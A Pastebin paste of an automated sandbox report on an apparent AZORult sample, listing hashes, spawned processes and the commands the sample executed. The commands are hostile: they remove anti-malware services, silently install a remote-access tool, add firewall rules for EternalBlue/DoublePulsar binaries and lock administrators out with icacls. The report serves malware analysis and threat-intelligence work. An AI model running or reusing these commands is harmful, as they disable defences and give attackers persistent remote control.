Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "AZORult"
- * MalScore: 10.0
- * File Name: "Exes_a83fb348f3b803d1dd92946e8dcf0e8c.rar"
- * File Size: 11405312
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "5bd2d341093fe91785282b2b35a685981135148a749f59cf6744f228acd8f561"
- * MD5: "a83fb348f3b803d1dd92946e8dcf0e8c"
- * SHA1: "3c58e579607ccd9f7e8896c55b67b9c1117b3d2c"
- * SHA512: "5b9e69b826284e70fdbe9a0e0fb9668aa0b1769bf17c984ffed78ed2bca18427a1f33ec4f7d31c87987d0f8318f7d3d42248d56bb7de7cf4bf05085ae211430f"
- * CRC32: "6A1E8155"
- * SSDEEP: "196608:zjTlZxXmNzSnU4A3mNmIV0vDjTX91Lkdi71wbFZ4/2DkUpQP49IEzASAB2HCNw:zdZxXYzhmEIAL9BeiUFZoc52PMIfSlx"
- * Process Execution:
- "Exes_a83fb348f3b803d1dd92946e8dcf0e8c.rar",
- "wini.exe",
- "wscript.exe",
- "cmd.exe",
- "regedit.exe",
- "regedit.exe",
- "timeout.exe",
- "rutserv.exe",
- "rutserv.exe",
- "rutserv.exe",
- "attrib.exe",
- "attrib.exe",
- "sc.exe",
- "sc.exe",
- "sc.exe",
- "winit.exe",
- "cmd.exe",
- "timeout.exe",
- "zeta.exe",
- "taskhostw.exe",
- "cmd.exe",
- "timeout.exe",
- "cheat.exe",
- "taskhost.exe",
- "taskhostw.exe",
- "winlogon.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "ipconfig.exe",
- "cmd.exe",
- "scaner.exe",
- "audiodg.exe",
- "R8.exe",
- "wscript.exe",
- "cmd.exe",
- "taskkill.exe",
- "taskkill.exe",
- "timeout.exe",
- "chcp.com",
- "Rar.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "icacls.exe",
- "cmd.exe",
- "icacls.exe",
- "cmd.exe",
- "icacls.exe",
- "cmd.exe",
- "icacls.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "sc.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "svchost.exe",
- "lsass.exe",
- "svchost.exe",
- "rutserv.exe",
- "rfusclient.exe",
- "rfusclient.exe",
- "rfusclient.exe",
- "spoolsv.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "appidpolicyconverter.exe",
- "taskhost.exe",
- "appidcertstorecheck.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1",
- "C:\\ProgramData\\Microsoft\\Intel\\wini.exe -pnaxui",
- "C:\\ProgramData\\install\\zeta.exe",
- "C:\\programdata\\install\\cheat.exe -pnaxui",
- "C:\\Windows\\system32\\cmd.exe /c sc delete swprv",
- "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\ProgramData\\Windows\\install.vbs\"",
- "C:\\ProgramData\\Windows\\install.vbs ",
- "C:\\ProgramData\\Windows\\winit.exe ",
- "C:\\ProgramData\\Install\\taskhostw.exe",
- "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"taskhostw.exe\"",
- "\"C:\\Programdata\\Windows\\install.bat\"",
- "C:\\Programdata\\Windows\\install.bat ",
- "C:\\Programdata\\Install\\del.bat",
- "C:\\ProgramData\\Microsoft\\Intel\\taskhost.exe ",
- "sc delete swprv",
- "regedit /s \"reg1.reg\"",
- "regedit /s \"reg2.reg\"",
- "timeout 2",
- "rutserv.exe /silentinstall",
- "rutserv.exe /firewall",
- "rutserv.exe /start",
- "C:\\Windows\\system32\\attrib.exe ATTRIB +H +S C:\\Programdata\\Windows\\*.*",
- "C:\\Windows\\system32\\attrib.exe ATTRIB +H +S C:\\Programdata\\Windows",
- "sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000",
- "sc config RManService obj= LocalSystem type= interact type= own",
- "sc config RManService DisplayName= \"Microsoft Framework\"",
- "C:\\Programdata\\RealtekHD\\taskhostw.exe",
- "C:\\programdata\\microsoft\\intel\\R8.exe",
- "C:\\Windows\\system32\\cmd.exe /c sc start appidsvc",
- "C:\\Windows\\system32\\cmd.exe /c sc start appmgmt",
- "C:\\Windows\\system32\\cmd.exe /c sc config appidsvc start= auto",
- "C:\\Windows\\system32\\cmd.exe /c sc config appmgmt start= auto",
- "C:\\Windows\\system32\\cmd.exe /c sc stop mbamservice",
- "C:\\Windows\\system32\\cmd.exe /c sc stop bytefenceservice",
- "C:\\Windows\\system32\\cmd.exe /c sc delete bytefenceservice",
- "C:\\Windows\\system32\\cmd.exe /c sc delete mbamservice",
- "C:\\Windows\\system32\\cmd.exe /c sc delete crmsvc",
- "C:\\Windows\\system32\\cmd.exe /c sc delete \"windows node\"",
- "C:\\Windows\\system32\\cmd.exe /c sc stop Adobeflashplayer",
- "C:\\Windows\\system32\\cmd.exe /c sc delete AdobeFlashPlayer",
- "C:\\Windows\\system32\\cmd.exe /c sc stop MoonTitle",
- "C:\\Windows\\system32\\cmd.exe /c sc delete MoonTitle\"",
- "C:\\Windows\\system32\\cmd.exe /c sc stop clr_optimization_v4.0.30318_64",
- "C:\\Windows\\system32\\cmd.exe /c sc delete clr_optimization_v4.0.30318_64\"",
- "C:\\Windows\\system32\\cmd.exe /c sc stop MicrosoftMysql",
- "C:\\Windows\\system32\\cmd.exe /c sc delete MicrosoftMysql",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall set allprofiles state on",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=TCP localport=445 action=block dir=IN",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=UDP localport=445 action=block dir=IN",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Block\" protocol=TCP localport=139 action=block dir=IN",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Port Block\" protocol=UDP localport=139 action=block dir=IN",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Recovery Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Shadow Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Security Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Recovery Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Shadow Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Security Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Survile Service\" dir=in action=allow program=\"C:\\ProgramData\\RealtekHD\\taskhostw.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"System Service\" dir=in action=allow program=\"C:\\ProgramData\\windows\\rutserv.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Shell Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\system.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Script Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\rundll.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Micro Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Doublepulsar-1.3.1.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"Small Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Eternalblue-2.2.0.exe\" enable=yes",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort1\" protocol=TCP localport=9494 action=allow dir=IN",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort2\" protocol=TCP localport=9393 action=allow dir=IN",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort3\" protocol=TCP localport=9494 action=allow dir=out",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"AllowPort4\" protocol=TCP localport=9393 action=allow dir=out",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP1\" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP2\" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP3\" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP4\" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP5\" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP6\" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP7\" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP8\" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP9\" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP10\" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP11\" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP12\" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP13\" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP14\" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP15\" protocol=TCP action=block dir=IN remoteip=172.104.56.113",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP16\" protocol=TCP action=block dir=OUT remoteip=172.104.56.113",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP17\" protocol=TCP action=block dir=IN remoteip=178.128.101.72",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP18\" protocol=TCP action=block dir=out remoteip=178.128.101.72",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP19\" protocol=TCP action=block dir=IN remoteip=210.108.146.96",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP20\" protocol=TCP action=block dir=out remoteip=210.108.146.96",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP21\" protocol=TCP action=block dir=IN remoteip=176.57.70.81",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP22\" protocol=TCP action=block dir=out remoteip=176.57.70.81",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP23\" protocol=TCP action=block dir=IN remoteip=61.130.8.22",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP24\" protocol=TCP action=block dir=out remoteip=61.130.8.22",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP25\" protocol=TCP action=block dir=IN remoteip=134.209.181.186",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP26\" protocol=TCP action=block dir=out remoteip=134.209.181.186",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP27\" protocol=TCP action=block dir=IN remoteip=134.209.188.169",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP28\" protocol=TCP action=block dir=out remoteip=134.209.188.169",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP29\" protocol=TCP action=block dir=IN remoteip=165.22.143.11",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP30\" protocol=TCP action=block dir=out remoteip=165.22.143.11",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=157.230.120.236",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=157.230.120.236",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=156.67.216.61",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=156.67.216.61",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=165.22.23.102",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=165.22.23.102",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=178.128.74.151",
- "C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=178.128.74.151",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny system:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny Administrators:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny system:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny Administrators:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"C:\\Windows\\NetworkDistribution\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
- "C:\\Windows\\system32\\cmd.exe /c icacls \"C:\\Windows\\NetworkDistribution\" /deny Administrators:(OI)(CI)(F)",
- "C:\\Programdata\\WindowsTask\\winlogon.exe",
- "C:\\Windows\\system32\\cmd.exe /c ipconfig /flushdns",
- "C:\\Windows\\system32\\cmd.exe /c gpupdate /force",
- "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\system32\\WININET.dll\",DispatchAPICall 1",
- "C:\\Programdata\\WindowsTask\\scaner.exe -pnaxui",
- "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\rdp\\run.vbs\"",
- "C:\\rdp\\run.vbs ",
- "sc start appidsvc",
- "sc start appmgmt",
- "sc config appidsvc start= auto",
- "sc config appmgmt start= auto",
- "\"C:\\rdp\\pause.bat\"",
- "pause.bat ",
- "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
- "C:\\ProgramData\\Windows\\rutserv.exe",
- "C:\\Windows\\System32\\spoolsv.exe",
- "C:\\Windows\\System32\\svchost.exe -k netsvcs",
- "C:\\Windows\\system32\\appidpolicyconverter.exe",
- "C:\\Windows\\system32\\appidcertstorecheck.exe",
- "sc stop mbamservice",
- "sc stop bytefenceservice",
- "taskkill /f /im Rar.exe",
- "timeout 3",
- "chcp 1251",
- "\"Rar.exe\" e -p555 db.rar",
- "sc delete bytefenceservice",
- "sc delete mbamservice",
- "sc delete crmsvc",
- "sc delete \"windows node\"",
- "sc stop Adobeflashplayer",
- "sc delete AdobeFlashPlayer",
- "sc stop MoonTitle",
- "sc delete MoonTitle\"",
- "sc stop clr_optimization_v4.0.30318_64",
- "sc delete clr_optimization_v4.0.30318_64\"",
- "sc stop MicrosoftMysql",
- "sc delete MicrosoftMysql",
- "netsh advfirewall set allprofiles state on",
- "netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=TCP localport=445 action=block dir=IN",
- "netsh advfirewall firewall add rule name=\"Port Blocking\" protocol=UDP localport=445 action=block dir=IN",
- "netsh advfirewall firewall add rule name=\"Port Block\" protocol=TCP localport=139 action=block dir=IN",
- "timeout 5",
- "netsh advfirewall firewall add rule name=\"Port Block\" protocol=UDP localport=139 action=block dir=IN",
- "netsh advfirewall firewall add rule name=\"Recovery Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Shadow Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Security Service\" dir=in action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Recovery Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Shadow Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AppModule.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Security Services\" dir=out action=allow program=\"C:\\ProgramData\\WindowsTask\\AMD.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Survile Service\" dir=in action=allow program=\"C:\\ProgramData\\RealtekHD\\taskhostw.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"System Service\" dir=in action=allow program=\"C:\\ProgramData\\windows\\rutserv.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Shell Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\system.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Script Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\rundll.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Micro Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Doublepulsar-1.3.1.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"Small Service\" dir=in action=allow program=\"C:\\ProgramData\\rundll\\Eternalblue-2.2.0.exe\" enable=yes",
- "netsh advfirewall firewall add rule name=\"AllowPort1\" protocol=TCP localport=9494 action=allow dir=IN",
- "netsh advfirewall firewall add rule name=\"AllowPort2\" protocol=TCP localport=9393 action=allow dir=IN",
- "netsh advfirewall firewall add rule name=\"AllowPort3\" protocol=TCP localport=9494 action=allow dir=out",
- "netsh advfirewall firewall add rule name=\"AllowPort4\" protocol=TCP localport=9393 action=allow dir=out",
- "netsh advfirewall firewall add rule name=\"HTTP1\" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255",
- "netsh advfirewall firewall add rule name=\"HTTP2\" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255",
- "netsh advfirewall firewall add rule name=\"HTTP3\" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255",
- "netsh advfirewall firewall add rule name=\"HTTP4\" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255",
- "netsh advfirewall firewall add rule name=\"HTTP5\" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255",
- "C:\\ProgramData\\Windows\\rfusclient.exe",
- "C:\\ProgramData\\Windows\\rfusclient.exe /tray",
- "netsh advfirewall firewall add rule name=\"HTTP6\" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255",
- "netsh advfirewall firewall add rule name=\"HTTP7\" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255",
- "netsh advfirewall firewall add rule name=\"HTTP8\" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255",
- "netsh advfirewall firewall add rule name=\"HTTP9\" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255",
- "netsh advfirewall firewall add rule name=\"HTTP10\" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248",
- "C:\\Windows\\system32\\cmd.exe /C schtasks /query /fo list",
- "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"Adobe Acrobat Update Task\" /F",
- "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"Adobe Flash Player NPAPI Notifier\" /F",
- "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"GoogleUpdateTaskMachineCore\" /F",
- "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"GoogleUpdateTaskMachineUA\" /F",
- "C:\\Windows\\system32\\cmd.exe /C schtasks /Delete /TN \"OfficeSoftwareProtectionPlatform\\SvcRestartTask\" /F",
- "netsh advfirewall firewall add rule name=\"HTTP11\" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255",
- "ipconfig /flushdns",
- "netsh advfirewall firewall add rule name=\"HTTP12\" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255",
- "schtasks /query /fo list",
- "netsh advfirewall firewall add rule name=\"HTTP13\" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255",
- "C:\\Windows\\system32\\timeout.exe 3",
- "netsh advfirewall firewall add rule name=\"HTTP14\" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255",
- "netsh advfirewall firewall add rule name=\"HTTP15\" protocol=TCP action=block dir=IN remoteip=172.104.56.113",
- "netsh advfirewall firewall add rule name=\"HTTP16\" protocol=TCP action=block dir=OUT remoteip=172.104.56.113",
- "netsh advfirewall firewall add rule name=\"HTTP17\" protocol=TCP action=block dir=IN remoteip=178.128.101.72",
- "netsh advfirewall firewall add rule name=\"HTTP18\" protocol=TCP action=block dir=out remoteip=178.128.101.72",
- "netsh advfirewall firewall add rule name=\"HTTP19\" protocol=TCP action=block dir=IN remoteip=210.108.146.96",
- "netsh advfirewall firewall add rule name=\"HTTP20\" protocol=TCP action=block dir=out remoteip=210.108.146.96",
- "netsh advfirewall firewall add rule name=\"HTTP21\" protocol=TCP action=block dir=IN remoteip=176.57.70.81",
- "netsh advfirewall firewall add rule name=\"HTTP22\" protocol=TCP action=block dir=out remoteip=176.57.70.81",
- "netsh advfirewall firewall add rule name=\"HTTP23\" protocol=TCP action=block dir=IN remoteip=61.130.8.22",
- "netsh advfirewall firewall add rule name=\"HTTP24\" protocol=TCP action=block dir=out remoteip=61.130.8.22",
- "schtasks /Delete /TN \"Adobe Acrobat Update Task\" /F",
- "netsh advfirewall firewall add rule name=\"HTTP25\" protocol=TCP action=block dir=IN remoteip=134.209.181.186",
- "netsh advfirewall firewall add rule name=\"HTTP26\" protocol=TCP action=block dir=out remoteip=134.209.181.186",
- "schtasks /Delete /TN \"Adobe Flash Player NPAPI Notifier\" /F",
- "netsh advfirewall firewall add rule name=\"HTTP27\" protocol=TCP action=block dir=IN remoteip=134.209.188.169",
- "schtasks /Delete /TN \"GoogleUpdateTaskMachineCore\" /F",
- "netsh advfirewall firewall add rule name=\"HTTP28\" protocol=TCP action=block dir=out remoteip=134.209.188.169",
- "netsh advfirewall firewall add rule name=\"HTTP29\" protocol=TCP action=block dir=IN remoteip=165.22.143.11",
- "schtasks /Delete /TN \"GoogleUpdateTaskMachineUA\" /F",
- "netsh advfirewall firewall add rule name=\"HTTP30\" protocol=TCP action=block dir=out remoteip=165.22.143.11",
- "schtasks /Delete /TN \"OfficeSoftwareProtectionPlatform\\SvcRestartTask\" /F",
- "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=157.230.120.236",
- "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=157.230.120.236",
